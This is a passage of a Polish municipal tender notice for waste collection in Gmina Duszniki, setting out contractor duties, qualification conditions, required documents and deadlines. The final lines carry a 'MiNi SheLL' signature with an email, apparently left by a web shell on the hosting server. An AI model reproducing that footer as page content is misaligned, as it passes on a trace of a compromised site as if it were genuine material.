 odebranych zmieszanych odpad. kom., pozostałości z sortowania odpad. kom. oraz odpadów zielonych do regionalnej instalacji przetwarzania odpad. kom. wskazanej w Planie Gospodarki Odpadami dla Województwa Wielkopolskiego,
zgodnie z art. 9e ust. 1 pkt 2 ustawy o utrzymaniu czystości i porządku w gminach.
 selektywnie zbieranych odpad. kom. do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy z dnia 27 kwietnia 2001 roku o odpadach (t.j. z 2010 roku Dz.U. Nr 185 poz, 1243 ze zm.) - zgodnie z art. 9e ust. 1 pkt 1 ww ustawy. W tym przypadku to odbierający wskazuje instalacje, do których będzie przekazywał odpady komunalne zbierane selektywnie. Ważne jest aby były to instalacje zapewniające uzyskanie właściwych poziomów odzysku i recyklingu poszczególnych frakcji odpadowych.
o) Wykonawca zobowiązany jest do naprawy pojemników w razie uszkodzenia ich z winy wykonawcy, a nie z powodu upływu czasu eksploatacji.
p) Wykonawca w okresie obowiązywania umowy zobowiązany jest osiągnąć poziom recyklingu i przygotowania do ponownego użycia wymaganych frakcji odpad. kom.: papieru, metali, tworzyw sztucznych i szkła oraz poziom recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych w wysokościach określonych w przepisach Rozporządzenia Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpad. kom. (Dz.U. z 2012 roku poz. 645).
q) Wykonawca w okresie obowiązywania umowy zobowiązany jest ograniczyć masę odpad. kom. ulegających biodegradacji przekazywanych do składowania do wysokości określonej w przepisach Rozporządzenia Ministra Środowiska z dnia 25 maja 2012 roku w sprawie poziomów ograniczenia masy odpad. kom. ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz.U. z 2012 roku poz. 676).
r) Wykonawca zgodnie z art. 9 lit. n ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (t.j. z 2012 roku poz. 391 ze zm.) zobowiązany jest do sporządzania kwartalnych sprawozdań i przekazywania ich Wójtowi Gminy Duszniki w terminie do końca miesiąca następującego po kwartale, którego dotyczy wraz z dokumentami sporządzonymi na potrzeby ewidencji odpadów oraz dokumentami potwierdzającymi osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpad. kom. ulegających biodegradacji przekazywanych do składowania. Sprawozdania te przygotowywane powinny być zgodnie z wzorem wskazanym w Rozporządzeniu. Sprawozdanie należy przekazać w formie pisemnej oraz elektronicznej. Program, w którym będą przekazywane sprawozdania powinien być kompatybilny z programem do prowadzenia gospodarki odpadami posiadanym przez Zamawiającego (tj. programem SIGID Ewidencja i Rozliczanie Opłat za Gospodarowanie Odpadami - ERGO).
s) W przypadku stwierdzenia, ze usługi wykonywane są niezgodnie z obowiązującymi przepisami prawa Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
t) Obowiązkiem Wykonawcy będzie odbieranie odpad. kom. od wszystkich właścicieli nieruchomości zamieszkałych położonych na terenie gminy Duszniki. Usługa obejmuje zapewnienie przez Wykonawcę dojazdu do punktów trudno dostępnych (szczególnie zimą i w okresie wzmożonych opadów deszczu i śniegu) poprzez zorganizowanie środków transportu, które umożliwią odbiór odpadów z punktów adresowych o problematycznej
lokalizacji. Zamawiający w cz. II pkt. 6 wskazuje minimalne wyposażenie techniczne Wykonawcy oraz podaje minimalne ilości posiadanych pojazdów. Z uwagi na specyfikę Gminy ważne jest aby Wykonawca zabezpieczył dodatkowy sprzęt umożliwiający dotarcie w trudno dostępne miejsca. Istotna ze strony Zamawiającego jest gwarancja ze strony Wykonawcy świadczenia usług w sposób należyty. W przypadku niemożności dotarcia do najbardziej kłopotliwych nieruchomości np. z powodu zasp śnieżnych, w przypadku uznania okoliczności jako w pełni uzasadnionej fakt nieodebrania odpadów nie będzie uznany za niewłaściwe wykonanie umowy. O zaistniałej sytuacji należy jednak powiadomić właściciela nieruchomości, do której dojazd okaże się niemożliwy (po konsultacji z Zamawiającym).
u) Wykonawca zobowiązany jest do realizacji przedmiotu umowy przy zachowaniu należytej staranności zgodnie z przepisami prawa w szczególności:
 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (t.j.z 2012 roku Dz. U. poz. 391 ze zm.),
 ustawy z dnia 27 kwietnia 2001 roku o odpadach (t.j. z 2010 roku Dz.U. Nr 185 poz. 1243 ze zm.),
 ustawy z 27 kwietnia 2001 roku Prawo ochrony środowiska (t.j. z 2008 roku Dz.U. Nr 25 poz. 150 ze zm.),
 Planu Gospodarki Odpadami dla Województwa Wlkp. na lata 2012-2017,
 Uchwały Rady Gminy Duszniki z dnia 28 grudnia 2012 roku Nr XXXI.202.12 w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy Duszniki,
 Uchwały Rady Gminy Duszniki z dnia 26 marca 2013 roku Nr XXXV.224.13 w sprawie ustalenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpad. kom. od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właścicieli nieruchomości opłatę za gospodarowanie odpadami komunalnymi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.10.00-2, 90.51.20.00-9, 90.53.30.00-2, 90.51.40.00-3, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium  w wysokości 20.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postepowaniu jest prowadzenie działaności w zakresie gospodarki odpadami, posiadanie aktualnego zaswiadczenia o wpisie do rejestru działaności regulowanej w zakresie  odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Duszniki oraz aktualnego zezwolenia na transport odpadów komunalnych obejmujących Gminę Duszniki
Ocena spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony , jezeli W Wykonawca  w okresie ostatnuich  3 lat przed upływem terminu składania ofert, a jezeli okres prowadzenia działnosci jest krótszy - w tym okresie  wykonywał usługi polegające na świadczeniu usług odbioru odpadów komunalnych od mieszkańców przez okres co najmniej 2 lat
Ocena spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli wykonawca będzie dysponował co najmniej dwoma pojazdami przystosowanymi do odbierania  zmieszanych odpadów komunalnych i pozostałości z segregacji odpadów - śmieciarki, dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, jednym pojazdem do odbierania odpadów bez frakcji kompaktujacej - wykaz ag wzoru w SIWZ
Ocena spełnia -nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca składa  ofertę:
1.na formularzu wg wzoru podanego w SIWZ - zał. nr 1 .
2.dokumenty  potwierdzające posiadanie pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych,
3.w przypadku, gdy Wykonawca będzie dysponował zasobami innych podmiotów przedstawia Zamawiającemu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian  zostały ujęte w paragrafie 10 projektu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.duszniki.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Duszniki, ul.Sportowa 1, 64-550 Duszniki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2013 godzina 10:00, miejsce: Urząd Gminy Duszniki, ul.Sportowa 1, 64-550 Duszniki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com